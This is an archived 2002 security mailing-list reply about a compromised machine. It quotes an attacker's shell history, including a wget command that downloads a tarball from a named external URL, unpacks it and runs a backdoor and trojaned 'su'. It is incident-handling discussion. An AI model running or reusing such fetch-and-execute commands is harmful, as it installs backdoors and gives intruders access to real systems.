At 12/16/2002 10:47 AM, Damian Gerow wrote: >Left in the .bash_history was this: > > w > cd /tmp > wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz > ./epc > >A quick check tells me that 'epc' is a backdoor utility, and the other >file contained within loc.tgz looks like a trojaned 'su'. > >I've already notified Geocities abuse, and haven't heard back from them >yet. Note that the file does not appear to be stored on the Geocities site; the Geocities site redirects to http://www.djteckh.com/loc.tgz, which is a Yahoo domain. Michael Katz mikeat_private Procinct Security ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:32:27 PST